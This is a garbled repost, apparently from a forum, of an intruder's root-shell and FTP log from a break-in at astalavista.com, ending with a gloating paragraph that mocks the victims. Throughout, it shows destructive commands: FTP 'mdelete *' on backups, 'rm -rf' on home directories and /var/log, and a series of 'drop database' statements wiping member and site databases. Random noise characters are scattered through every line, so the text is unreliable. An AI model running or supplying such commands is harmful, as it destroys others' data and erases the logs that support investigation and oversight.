-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
6 K) r. i9 X7 I% Z4 ] d: E5 N-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
$ \4 o- M3 E+ Y* k/ ]+ _& x-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar# l) m; C& Y* H* W: g* u2 C
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar& h0 u- p/ d: I! j- D0 U. X
[snip]
& n6 b& w0 r( O. Z7 P/ L; z226 Transfer complete.
) c# h+ p6 v2 x7 j+ gftp> mdelete *
7 L9 I7 [) {7 rftp> ls -la' S# L2 j# w0 \; v, b' U( {
227 Entering Passive Mode (212,254,194,163,2,193)
A6 ^# h2 s+ u150 Opening BINARY mode data connection for ‘file list’.
) K* r% `: y0 h n3 a. Q226 Transfer complete.
. Y& g M2 w4 `, Y1 E! k" }% v9 Cftp>- Z7 J' a8 i& ^$ c7 Y9 P
, O7 t* D" K" T) {, `/ N0 j3 Tsh-3.2# cd /home! t- L& E) f: i8 |, |5 h |
sh-3.2# ls -la
( e/ L: D: ]" ?5 ctotal 120
3 U+ i! H7 z: m4 q( E6 Xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
) P" n. l: f4 ]- H: W [6 p2 [drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 U" g& O: N) G1 O; udrwx–x–x 9 admin admin 4096 Nov 28 2007 admin5 ~7 I- d6 G+ j+ k8 ^
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group5 v0 _) ~. t1 X3 ]' N
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
* O: h6 H- v& g6 D0 xdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
4 q( p% W/ ?7 Sdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
7 v2 P' U* @* D; v% M7 U/ N9 ?drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
9 K! N! l) n- J7 z& O: Edrwx–x–x 10 com com 4096 Apr 28 12:40 com
: ^9 s9 K5 e. j) @! Y* O1 }2 s7 v, b8 Bdrwxr-xr-x 2 root root 4096 May 17 2007 ftp+ y+ |$ W6 c) B% ?' [
drwx—— 3 jon jon 4096 Sep 21 2007 jon" s% }4 l9 c$ `3 ~3 C' Q1 }
drwx—— 2 root root 16384 Sep 11 2007 lost+found k) b5 ]; u* D& U( |0 l
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
: e) ]' B/ V5 M3 D5 D) Vdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
" e. N" T- j7 Q G7 K* edrwx—— 2 jon jon 4096 Sep 15 2007 test
2 d' J5 [ B1 V- e$ g1 `! Gdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
, D* d- [; \2 k2 R. D' R9 o( Q. q
6 X! y& d! S" a( C' `7 C9 Osh-3.2# rm -rf backup/
5 @7 D# H. t' W$ Psh-3.2# rm -rf backup.14161/
8 \8 f4 I) R+ O4 c, Osh-3.2# rm -rf ftp/: G2 B$ o6 Y4 i3 h% k
sh-3.2# rm -rf jon/* F& h# W0 d( \6 T9 h& I
sh-3.2# rm -rf my/$ t; }6 O, g) O
sh-3.2# rm -rf mysqldata/
9 S# S8 m, e: V1 R$ ksh-3.2# rm -rf test/
& M: @2 ]6 r& ?0 E4 W5 dsh-3.2# rm -rf tmp/& n3 i3 X1 M u3 n: c
sh-3.2# cd ~6 N, j; h$ ~6 e1 j% B1 ]
sh-3.2# rm -rf *
z6 J( u& z% f& N( ash-3.2# rm -rf /var/log/+ ]! o9 ?* l1 t' N1 Z/ p! N! t7 x
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
2 A5 w- R8 ^/ ~1 ssh-3.2# rm -rf /home/*/ \: [' C% T, C
sh-3.2# mysql
, ?3 J# t9 Y& N7 V" T! z7 QWelcome to the MySQL monitor. Commands end with ; or \g.
8 ]% T7 o3 @$ z4 x- m5 tYour MySQL connection id is 407156! c) Q/ C$ A" @; c U; f% d
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
7 G) q3 n; \4 v7 c+ W7 T) F w( I% j& }% O. M1 m8 I
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.: Z4 ]" n" X) }6 s9 J4 y; x
; w) J4 o9 O( f# xmysql> show databases;5 Q* b: j5 Z6 {: C1 W3 z4 S+ Q1 o
+———————–+
4 g" i* B. m; s3 w1 c| Database |
" m/ {9 z. L* `% M+———————–+( \6 U8 y5 x) Z
| information_schema |3 v6 S4 {+ `2 J3 S
| astanet_ads |
. d" `0 Z4 n8 |7 D| astanet_mailing_lists |
/ z1 ^8 \+ p" ^9 k$ ]/ X1 a4 N) V| astanet_mediawiki |
9 e' _) C( W0 _& _7 a% {| astanet_membersystem |' K0 V) K6 C4 N- W
| com_contrexx |% d- [% L* R0 {2 }. i' L a/ d
| com_contrexx2 |9 c2 Z7 T% y" _( i+ Q( S1 P
| com_contrexx2_live |! T6 W# ?% U+ o% {& C, }5 r. v
| da_roundcube |
[+ m9 z2 H4 l| dolphin |0 R8 S( Y* ?& M4 S; E: [/ U3 \
| ideapool |; I& q# }! k1 Y* f- O
| mysql |0 ~' \& h$ u$ a2 W7 R' u0 o" E
| test |* v+ y6 c6 G6 e/ t: L* L% n
| yourmaster | u" N5 v l" O7 k- `$ R
+———————–+6 H2 J+ T8 u& G
14 rows in set (0.03 sec)
' x: j1 y4 s" @0 z$ N! m. E' B5 e; J! ^* a5 ]3 p! p7 G
mysql> drop database astanet_membersystem;
$ b2 N- ^3 S4 P( J' t+ F2 k% x8 U* IdroQuery OK, 46 rows affected (0.81 sec)
& Y- J' S& G" w" B" U, W# g- \$ s+ a6 p( }- J3 k
mysql> drop database com_contrexx;
& y) p& `/ ?+ S. FQuery OK, 211 rows affected (2.72 sec)
7 ^; ?! B' d( g- g+ B8 x, n2 E8 u6 Z1 o2 N+ |* ~+ p
mysql> drop database com_contrexx2;6 K5 Z- F c. K" [/ k& P/ ~
Query OK, 237 rows affected (2.23 sec)
0 Y0 D6 D6 ]# N
) l! s/ o0 H: c: l9 t" _mysql> drop database com_contrexx2_live;& j% ]5 ?2 P3 {+ I5 L) P
Query OK, 227 rows affected (7.63 sec)
3 H* C4 N' K0 d0 T
& o8 D- I- j5 r. f/ r$ p5 vmysql> drop database ideapool;- X( `( @5 p9 W( `& D2 g
Query OK, 69 rows affected (0.19 sec)* A M" W8 i% d; h
' v1 G& n2 e6 v1 M- U4 f, N- Cmysql> drop database yourmaster;# k; R+ S* l" m* q' v/ z
Query OK, 158 rows affected (0.55 sec)" I' U3 m F4 J
* U' T% h: ~3 W/ C. Y# U7 M, Kmysql> drop database astanet_ads;
; E5 m6 z5 X/ X$ V- W5 \Query OK, 9 rows affected (0.11 sec)
* y8 A0 @% h8 u/ W/ N5 p, u' f9 G4 I' {* e
mysql> drop database astanet_mailing_lists;1 ^6 J6 ~, C5 e0 L1 a
Query OK, 24 rows affected (1.47 sec)
8 K, _- \5 w0 ~
! u7 p" ]. f! V9 J0 b8 i7 wmysql> drop database astanet_mediawiki;
, p2 }1 I) |6 X7 C7 r4 p* `" {Query OK, 31 rows affected (0.51 sec)9 r6 N( o0 [* J; i9 e: ~- n- t" I
# P: G' b% U( g+ D. O: I- X Qmysql> show databases;
" p+ S- Y& Q* h% S+——————–+1 G& d4 @9 ]/ i
| Database |( E6 ]$ X: P5 s" c
+——————–+$ |: S' j; I" y4 M
| information_schema |
6 u; ]% [1 T& W/ s% w( Y U N/ R| da_roundcube |
/ v+ G# H j2 W/ `| dolphin |% [6 x' K( [" z
| mysql |
0 ^& p, }4 d- S* H| test |7 T- z# F! a: h3 ?* |
+——————–+
' Y# q- a( ?) h0 ^5 rows in set (0.00 sec)
# R6 l$ k1 _% I/ O9 K. j. i( j' {7 f
What a journey! We’re not sure exactly why the “Terminator” had any influence on7 \' a7 h$ }2 d
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the3 }! \, Z# p0 Q8 {3 E
wrong to say this pack of morons *wont be back*. c4 d7 k6 y9 h3 j
|
发表于 2012-11-6 21:07:34
收藏
支持
反对